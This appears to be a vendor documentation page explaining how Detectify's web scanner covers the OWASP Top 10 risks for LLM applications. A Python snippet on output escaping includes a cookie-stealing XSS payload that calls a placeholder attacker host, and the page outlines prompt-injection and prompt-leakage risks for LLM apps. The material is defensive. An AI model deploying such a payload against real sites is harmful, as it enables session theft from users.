OWASP LLM Top 10
What it is — The OWASP Top 10 for Large Language Model Applications identifies the most critical security risks specific to applications that integrate large language models (LLMs). Published by OWASP, the current version (2025) addresses risks ranging from prompt injection and improper output handling to supply chain vulnerabilities in AI/ML deployments.
Appsec relevance — LLM applications are web applications with additional attack vectors. Traditional web security risks (injection, information disclosure, authentication bypass) still apply, and new risks emerge from the model integration layer.
How Detectify Supports the OWASP LLM Top 10:2025
| Category | What it covers | How Detectify helps | Coverage level |
|---|---|---|---|
| LLM01:2025 Prompt Injection | Crafted inputs manipulate the LLM into executing unintended actions or bypassing guardrails | Template injection tests (CWE-1336) provide foundational coverage for server-side prompt injection patterns | Partial |
| LLM02:2025 Sensitive Information Disclosure | LLM inadvertently reveals confidential data such as PII, credentials, or proprietary information in responses | Information exposure detection (CWE-200) covers data leakage in web responses | Partial |
| LLM03:2025 Supply Chain | Vulnerabilities in third-party components, pre-trained models, or training data compromise application security | Technology and component detection via Surface Monitoring, CVE-specific test modules generated by Alfred AI | Partial |
| LLM05:2025 Improper Output Handling | LLM output is passed to downstream components without validation, enabling XSS, SSRF, or code execution | XSS, SQL injection, and other injection tests detect improper handling of LLM output rendered in web contexts | Full (web output contexts) |
| LLM07:2025 System Prompt Leakage | System prompts or instructions are exposed to users, potentially revealing sensitive business logic, API keys, or internal configurations | Information exposure detection (CWE-200) identifies sensitive data leakage in web responses | Partial |
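The LLM05 row above is the classic failure mode: raw model output is interpolated into an HTML page, so any markup the model emits (including markup an attacker steered it into emitting via prompt injection) executes in the user's browser. A minimal sketch of the vulnerable pattern and its fix, using Python's standard `html.escape` (this illustrates the vulnerability class, not Detectify's actual test logic):

```python
import html

def render_chat_reply(llm_output: str, escape: bool = True) -> str:
    """Embed an LLM reply in an HTML fragment.

    With escape=False the raw model output reaches the DOM unmodified,
    enabling stored/reflected XSS (LLM05: Improper Output Handling).
    """
    body = html.escape(llm_output) if escape else llm_output
    return f"<div class='reply'>{body}</div>"

# Attacker-influenced model output containing a script payload
# (evil.example is a placeholder domain for illustration):
malicious = "<script>fetch('//evil.example/?c='+document.cookie)</script>"

unsafe = render_chat_reply(malicious, escape=False)  # payload reaches the DOM
safe = render_chat_reply(malicious)                  # rendered as inert text

assert "<script>" in unsafe
assert "<script>" not in safe
```

The same principle applies to every downstream sink: SQL queries, shell commands, and URLs built from model output need the same parameterization or encoding you would apply to any untrusted user input.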
AI/ML Tool Exposure Detection
Detectify includes dedicated tests for exposed and unauthenticated AI/ML tools, including Gradio, ComfyUI, llama.cpp, Open WebUI, Stable Diffusion WebUI, Jan.ai, Xinference, and others. These tests detect publicly accessible AI infrastructure that should not be exposed to the internet — a practical security risk that goes beyond the LLM Top 10 categories.
What Detectify Covers
Detectify addresses the web application security layer of LLM deployments. It detects injection vulnerabilities that could enable prompt injection, identifies improper output handling that leads to XSS or further injection, and discovers exposed AI/ML infrastructure. For categories where traditional DAST testing applies (LLM01, LLM02, LLM03, LLM05, LLM07), Detectify provides partial to full coverage.
Categories tied to model internals and runtime behavior (data and model poisoning, excessive agency, misinformation, unbounded consumption) are outside the scope of DAST testing.
Complementary Tools You May Need
- LLM-specific security testing tools — For prompt injection testing beyond template injection patterns
- Model monitoring and observability — For detecting anomalous model behavior
- Software composition analysis (SCA) — For comprehensive supply chain tracking of ML dependencies
- Access control and IAM — For restricting model access and preventing model theft
- Red teaming — For evaluating LLM-specific attack scenarios